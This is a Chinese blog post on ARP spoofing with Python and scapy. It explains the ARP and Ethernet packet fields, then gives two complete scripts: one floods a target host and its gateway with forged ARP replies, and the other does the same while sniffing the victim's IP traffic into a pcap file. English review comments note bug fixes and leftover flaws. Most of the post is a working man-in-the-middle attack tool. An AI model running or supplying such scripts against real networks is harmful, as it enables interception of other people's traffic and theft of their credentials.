Python ARP 欺骗

ls(ARP())
hwtype     : XShortField                         = 1               ('1')
ptype      : XShortEnumField                     = 2048            ('2048')
hwlen      : FieldLenField                       = None            ('None')
plen       : FieldLenField                       = None            ('None')
op         : ShortEnumField                      = 1               ('1')
hwsrc      : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc       : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst      : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst       : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0'       ('None')
>>>
op操作码:默认1,取值1或2,分别代表ARP请求包或响应包(请求操作或响应操作)
hwsrc:发送方MAC地址,用于告诉对方我的MAC地址是什么,默认为本机,所以可以忽略此属性
psrc:发送方IP地址,用于告诉对方我的IP地址是什么;ARP本身没有认证机制,接收方无法校验该字段,所以它可以被伪装
这个报文发给谁,由下面的两个属性决定:
hwdst: 对方的MAC地址
pdst:对方的IP地址

ls(Ether())
dst        : DestMACField                        = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src        : SourceMACField                      = 'dc:a6:32:bb:49:9d' ('None')
type       : XShortEnumField                     = 36864           ('36864')
>>>
构造ARP包:
欺骗目标主机,我是网关:
发送给目标主机
import sys,time
from scapy.all import *
from optparse import OptionParser
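def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Re-announce the genuine IP-to-MAC bindings of the gateway and the target.

    Two ARP replies (op=2) are sent, each carrying the real hardware address
    of its sender: one advertises gateway_ip at gateway_mac, the other
    advertises target_ip at target_mac.

    Args:
        gateway_ip: IP address of the gateway.
        gateway_mac: Real MAC address of the gateway.
        target_ip: IP address of the target host.
        target_mac: Real MAC address of the target host.
    """
    print("[*]恢复ARP缓冲。。。")
    # hwdst="ff:ff:ff:ff:ff:ff" marks the reply as a broadcast.
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    # Repeat the second correction as often as the first one; a single frame
    # can be lost, which would leave the gateway with the stale entry.
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)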

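def attact_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send forged ARP replies to the target and the gateway until Ctrl+C.

    Neither packet sets hwsrc, so scapy fills in the sending machine's own
    MAC address. On the wire this shows up as unsolicited op=2 replies,
    repeated every two seconds, that rebind an existing IP to a new MAC;
    that pattern is what ARP monitoring and dynamic ARP inspection look for.

    Args:
        gateway_ip: IP address of the gateway.
        gateway_mac: Real MAC address of the gateway.
        target_ip: IP address of the target host.
        target_mac: Real MAC address of the target host.
    """
    # Reply for the target host: claims to come from gateway_ip.
    poison_target=ARP()
    poison_target.op=2
    poison_target.psrc=gateway_ip
    poison_target.pdst=target_ip
    poison_target.hwdst=target_mac
    # Reply for the gateway: claims to come from target_ip.
    poison_gateway=ARP()
    poison_gateway.op=2
    # The original assigned gateway_ip here, so psrc equalled pdst and the
    # packet did not match the intent stated in the original comment.
    poison_gateway.psrc=target_ip
    poison_gateway.pdst=gateway_ip
    poison_gateway.hwdst=gateway_mac
    print("[]正在进行投毒[CTRL+C结束「")
    while True:
        try:
            # Resend both replies on every round.
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            # Put the genuine bindings back before leaving the loop.
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
            break
    print("[*]ARP投毒结束")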
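def main():
    """Parse the command line, resolve both MAC addresses and start the demo.

    Requires -i (interface), -g (gateway IP) and exactly one positional
    argument; otherwise the help text is printed and the process exits.
    The process also exits, with status 1, when either MAC address cannot
    be resolved, so no packet is sent towards an unknown hardware address.
    """
    usage='sudo python3 arpspoof [-i interface] [-g gateway] host'
    parser=OptionParser(usage)
    parser.add_option('-i',dest="interface",type='string',help='网卡')
    parser.add_option('-g',dest='gateway',type='string',help='网关')
    (options,args)=parser.parse_args()
    if len(args)!=1 or options.interface is None or options.gateway is None:
        parser.print_help()
        sys.exit(0)
    interface=options.interface  # network interface, e.g. "wlan0"
    gateway_ip=options.gateway  # gateway address, e.g. "192.168.1.1"
    # NOTE(review): the positional "host" argument is counted above but never
    # read; the target address stays fixed to this value.
    target_ip="192.168.1.254"
    conf.iface=interface
    conf.verb=0
    gateway_mac=getmacbyip(gateway_ip)
    if gateway_mac is None:
        print("mac获取失败")
        # The original called the misspelled sys.eixt(), which raised
        # AttributeError instead of exiting cleanly.
        sys.exit(1)
    print(gateway_ip,gateway_mac)
    target_mac=getmacbyip(target_ip)
    if target_mac is None:
        print("获取目标MAC失败")
        # The original carried on with target_mac=None after this message.
        sys.exit(1)
    print("目标主机:%s MAC:%s" % (target_ip,target_mac))
    attact_target(gateway_ip,gateway_mac,target_ip,target_mac)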
    
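# Run only when executed as a script, so importing this module has no side effects.
if __name__ == "__main__":
    main()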

 

from scapy.all import *
import os
import sys
import threading
import signal
 
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Broadcast the genuine ARP bindings, then send SIGINT to this process.

    Each corrective reply (op=2) carries the real MAC of the host it speaks
    for and is sent five times to the broadcast hardware address.

    Args:
        gateway_ip: IP address of the gateway.
        gateway_mac: Real MAC address of the gateway.
        target_ip: IP address of the target host.
        target_mac: Real MAC address of the target host.
    """
    print("[*] Restoring target... ")
    broadcast = "ff:ff:ff:ff:ff:ff"
    gateway_binding = ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac,
                          pdst=target_ip, hwdst=broadcast)
    target_binding = ARP(op=2, psrc=target_ip, hwsrc=target_mac,
                         pdst=gateway_ip, hwdst=broadcast)
    for correction in (gateway_binding, target_binding):
        send(correction, count=5)
    # Signal our own process; with Python's default SIGINT handler this
    # surfaces as KeyboardInterrupt in the main thread.
    own_pid = os.getpid()
    os.kill(own_pid, signal.SIGINT)
 
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Args:
        ip_address: IPv4 address to look up.

    Returns:
        The Ethernet source address of the first answer, or None when no
        answer arrived (2 second timeout, retry=10).
    """
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(probe, timeout=2, retry=10)
    # Only the first (sent, received) pair is consulted.
    first_reply = next((reply for _sent, reply in answered), None)
    if first_reply is None:
        return None
    return first_reply[Ether].src
 
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    """Send one forged ARP reply to the target and one to the gateway every 2 s.

    Neither packet sets hwsrc. The loop has no break, so it ends only when an
    exception escapes it, and the final print is not reached otherwise.

    NOTE(review): the script starts this function in a worker thread, while
    CPython raises KeyboardInterrupt in the main thread, so the handler below
    presumably never runs there; confirm.

    Args:
        gateway_ip: IP address of the gateway.
        gateway_mac: Real MAC address of the gateway.
        target_ip: IP address of the target host.
        target_mac: Real MAC address of the target host.
    """
    # Reply for the target: claims to come from gateway_ip.
    reply_for_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    # Reply for the gateway: claims to come from target_ip.
    reply_for_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)
    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while True:
        try:
            for forged_reply in (reply_for_target, reply_for_gateway):
                send(forged_reply)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    print("[*] ARP poison attack finished. ")
 
# Script body: resolve both MAC addresses, start the ARP sender in a worker
# thread, capture the target's IP traffic to arper.pcap, then restore.
interface = "wlan0"
target_ip ="192.168.1.254"
# Host whose ARP cache is targeted.
gateway_ip = "192.168.1.1"
# Gateway of the network.
packet_count = 1000
# Number of packets the sniffer below captures before it stops.
 
# Interface scapy sends and sniffs on.
conf.iface = interface
 
# Silence scapy's own output.
conf.verb = 0
 
print("[*] Setting up %s" % (interface))
# (A disabled print of the target's IP and MAC stood here; target_mac is not
# resolved yet at this point.)
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC.  Exiting. ")
    sys.exit(0)
else:
    print("[*] Gateway %s is at %s"%(gateway_ip,gateway_mac))
 
target_mac = get_mac(target_ip)
 
if target_mac is None:
    print("[!!!] Failed to get target MAC.  Exiting. ")
    sys.exit(0)
else:
    print("[*] Target %s is at %s"%(target_ip,target_mac))
 
# Start the ARP sender in its own thread.
# NOTE(review): poison_target loops without a break and this thread is not a
# daemon, so it appears to keep sending after restore_target has run and to
# keep the process alive, leaving the ARP caches wrong; confirm.
poison_thread = threading.Thread(target=poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()
 
try:
    print("[*] Starting sniffer for %d packets" % (packet_count))
    # BPF filter: only IP traffic to or from the target.
    bpf_filter = "ip host %s"%target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
 
    # Write the captured packets to a pcap file.
    wrpcap('arper.pcap',packets)
    # Restore the genuine ARP bindings.
    # NOTE(review): restore_target ends by sending SIGINT to this process,
    # which presumably raises KeyboardInterrupt right here and makes the
    # handler below restore a second time; confirm.
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
    # Restore the genuine ARP bindings.
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

 



posted @ 2022-11-24 16:38  myrj